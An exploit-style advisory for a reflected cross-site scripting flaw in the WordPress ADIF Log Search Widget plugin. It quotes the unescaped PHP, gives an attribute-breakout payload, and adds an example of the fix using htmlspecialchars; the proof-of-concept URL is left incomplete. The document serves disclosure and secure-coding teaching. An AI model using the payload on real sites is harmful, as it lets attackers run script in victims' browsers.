# Exploit Title: ADIF Log Search Widget XSS Vulnerability
# Google Dork:
# Date: 26/05/13
# Exploit Author: k3170makan
# Vendor Homepage: http://wordpress.org/plugins/adif-log-search-widget/
# Software Link: http://wordpress.org/plugins/adif-log-search-widget/
# Version: 1.0e
# Tested on: Ubuntu 12.04.2 LTS
The WordPress ADIF Log Search Widget plugin suffers from a cross-site scripting vulnerability: the value of the `call` request parameter is echoed back into the page without any escaping.
Code: logbook_search.php (lines 55-58)
---------------------------------------------------------------------------------------------------------
echo "
<div id=\"logbook_poplight\" class=\"logbook_poplight\" title=\"$num_rows QSO's with ".$_REQUEST['call']."\">";
echo "<table>";
echo " <tr>";

Code: logbook_search.php (lines 93-102)
---------------------------------------------------------------------------------------------------------
else{
    echo "

    <div id=\"logbook_poplight\" class=\"logbook_poplight\" title=\"No QSO's with ".$_REQUEST['call']."\">
    Sorry, nothing found in the logbook!
    </div>
    ";
    logbook_search_form();
}
}
The above code fails to sanitize the "$_REQUEST['call']" value passed to the script from the widget's HTML form and writes it straight into the title attribute of a div, so a value containing a double quote closes the attribute and lets an attacker inject HTML/JavaScript into the victim's browser session. Because the value is read from $_REQUEST, it can be supplied in a GET query string as well as through the form, so a crafted link is enough to trigger it.
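The attribute breakout described above, reproduced as an added example that is not the plugin's own code: the first function mirrors the vulnerable echo from logbook_search.php, the second shows the hardened form. The attacker value and the `$num_rows` count are constructed for the example; the escaping uses plain PHP htmlspecialchars() so it runs outside WordPress, where the equivalent call is esc_attr().

```php
<?php
// Added example (not the plugin's code). Models how logbook_search.php
// builds the popup div from $_REQUEST['call'] and how to escape it.

// Constructed attacker input: closes the title attribute and adds an
// event handler. In the real plugin this arrives as the `call` parameter.
$call = '" onmouseover="alert(1)';
$num_rows = 0;   // constructed; the plugin gets this from its DB query

// Vulnerable form, as on the page: the raw request value is concatenated
// into a double-quoted HTML attribute.
function render_vulnerable($num_rows, $call) {
    return "<div id=\"logbook_poplight\" class=\"logbook_poplight\" "
         . "title=\"$num_rows QSO's with " . $call . "\">";
}

// Hardened form: escape for the HTML-attribute context before output.
// ENT_QUOTES encodes both quote characters, so the value cannot leave
// the attribute. In WordPress use esc_attr($call) instead.
function render_safe($num_rows, $call) {
    $safe_call = htmlspecialchars($call, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div id=\"logbook_poplight\" class=\"logbook_poplight\" "
         . "title=\"" . (int) $num_rows . " QSO's with " . $safe_call . "\">";
}

echo render_vulnerable($num_rows, $call), "\n";   // handler lands outside the attribute
echo render_safe($num_rows, $call), "\n";         // quotes are encoded, handler stays inert text
```

In the vulnerable output the injected `onmouseover` becomes a real attribute of the div; in the hardened output the double quotes are emitted as `&quot;`, so the whole attacker string remains part of the title value. Escape at the output point for the context being written (attribute here), not only on input, because the same value could later be placed in a different context.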
PoC:
http://[domain]/wordpress/?